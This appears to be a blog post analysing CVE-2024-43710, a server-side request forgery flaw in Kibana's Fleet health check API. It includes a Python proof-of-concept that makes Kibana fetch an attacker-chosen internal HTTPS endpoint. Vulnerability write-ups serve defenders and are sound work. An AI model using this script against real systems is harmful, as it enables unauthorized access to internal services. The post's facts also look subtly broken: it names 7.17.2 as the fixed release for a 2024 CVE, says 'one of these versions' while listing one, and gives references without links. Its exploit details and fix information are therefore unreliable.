A recent vulnerability, CVE-2024-43710, has been discovered in Kibana, the popular data visualization and exploration platform used in conjunction with Elasticsearch. Kibana is an integral component of the Elastic Stack, which also includes Beats and Logstash. This vulnerability involves a server side request forgery (SSRF) issue and is specifically related to the '/api/fleet/health_check' API endpoint. This blog post aims to provide an in-depth analysis of this vulnerability, relevant code snippets, original references, and exploit details.
Vulnerability details
The vulnerability lies within the Kibana Fleet health check API, which is exposed at '/api/fleet/health_check'. Malicious users with read access to Fleet can send requests to internal endpoints using this API, potentially leading to unauthorized access or disclosure of sensitive information. However, this SSRF vulnerability has its limitations - attackers can only access HTTPS endpoints, and the response must be provided in JSON format.
Exploit scenario
An attacker with read-permissions to Fleet executes a request to '/api/fleet/health_check', which causes Kibana to make an outbound request to an internal HTTPS endpoint specified by the attacker. If the target endpoint returns data in JSON format, Kibana will process the data accordingly and provide the attacker with the information.
Original references
1. Elastic Security Advisory: This official advisory from Elastic provides details about the SSRF vulnerability, along with the releases that fix this issue.
2. NVD - National Vulnerability Database: The US National Vulnerability Database entry for the SSRF vulnerability discovered in Kibana.
Here's a Python code snippet illustrating how an attacker might exploit the SSRF vulnerability
import requests
kibana_url = 'https://kibana.example.com'; # Replace with target Kibana instance URL
internal_endpoint = 'https://internal.example.com/secret'; # Replace with internal HTTPS endpoint
payload = {
"url": internal_endpoint
}
response = requests.post(
f"{kibana_url}/api/fleet/health_check",
json=payload,
headers={"Content-Type": "application/json"},
)
print(response.json())
This script targets an instance of Kibana by sending a POST request to the '/api/fleet/health_check' endpoint. Upon running, it will display the JSON data received from the specified 'internal_endpoint'.
Mitigation
It's critical to update Kibana to a version that isn't affected by this vulnerability. Elastic has addressed this SSRF vulnerability in the following Kibana versions:
7.17.2
To protect your systems, it's recommended to update Kibana to one of these versions immediately.
Conclusion
While the SSRF vulnerability associated with CVE-2024-43710 has certain limitations, it still presents a significant risk to Kibana instances with users granted read access to Fleet. By understanding the vulnerability, developers and administrators can take steps to mitigate the risk - namely by updating Kibana to the latest, secure version. Always ensure you're running the most recent, patched version of software to minimize exposure to known vulnerabilities.
Timeline
Published on: 01/23/2025 06:15:27 UTC